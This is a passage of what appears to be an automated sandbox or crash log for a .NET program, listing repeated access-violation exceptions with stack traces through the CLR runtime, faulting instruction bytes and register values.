0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007780
registers.edi: 3008028
registers.eax: 0
registers.ebp: 3008040
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x7af738
0x7af1e9
0x7af11d
0x7ad80b
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008016
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3008024
registers.edx: 0
registers.ebx: 3010700
registers.esi: 44710356
registers.ecx: 44968592
1 0 0

__exception__

 stacktrace: 
0x4fb3fd5
0x4fb3ea8
0x7af105
0x7adf83
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007740
registers.edi: 3007988
registers.eax: 0
registers.ebp: 3008000
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb4456
0x4fb3ea8
0x7af105
0x7adf83
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3007976
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3007984
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 46536292
1 0 0

__exception__

 stacktrace: 
0x4fb3fd5
0x4fb3ea8
0x7af11d
0x7adf83
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007740
registers.edi: 3007988
registers.eax: 0
registers.ebp: 3008000
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb4456
0x4fb3ea8
0x7af11d
0x7adf83
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3007976
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3007984
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 48140232
1 0 0

__exception__

 stacktrace: 
0x4fb3fd5
0x4fb3ea8
0x7af11d
0x7adf83
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007740
registers.edi: 3007988
registers.eax: 0
registers.ebp: 3008000
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb4456
0x4fb3ea8
0x7af11d
0x7adf83
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3007976
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3007984
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 49491532
1 0 0

__exception__

 stacktrace: 
0x4fb4724
0x4fb45d8
0x7af105
0x7ae085
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007804
registers.edi: 3008052
registers.eax: 0
registers.ebp: 3008064
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb49fa
0x4fb45d8
0x7af105
0x7ae085
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008040
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008048
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43958756
registers.ecx: 44597592
1 0 0

__exception__

 stacktrace: 
0x4fb4724
0x4fb45d8
0x7af11d
0x7ae085
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007804
registers.edi: 3008052
registers.eax: 0
registers.ebp: 3008064
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb49fa
0x4fb45d8
0x7af11d
0x7ae085
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008040
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008048
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 46092248
1 0 0

__exception__

 stacktrace: 
0x4fb4724
0x4fb45d8
0x7af11d
0x7ae085
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 38 25 a9 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7afc14
registers.esp: 3007804
registers.edi: 3008052
registers.eax: 0
registers.ebp: 3008064
registers.edx: 78193608
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4fb35d0
0x4fb49fa
0x4fb45d8
0x7af11d
0x7ae085
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4fb3613
registers.esp: 3008040
registers.edi: 3008316
registers.eax: 0
registers.ebp: 3008048
registers.edx: 0
registers.ebx: 3010700
registers.esi: 43957676
registers.ecx: 47586904
1 0 0

__exception__

 stacktrace: 
0x4fb4d6d
0x4fb4c48
0x7af105
0x7ae172
0x7acace
0x7ac7af
0x7a6d75
0x7a6886
0x7a34ab
0x7a2f10
0x7a2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71f22652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71f3264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71f32e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x71fe74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x71fe7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72071dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72071e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72071f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7207416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72caf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
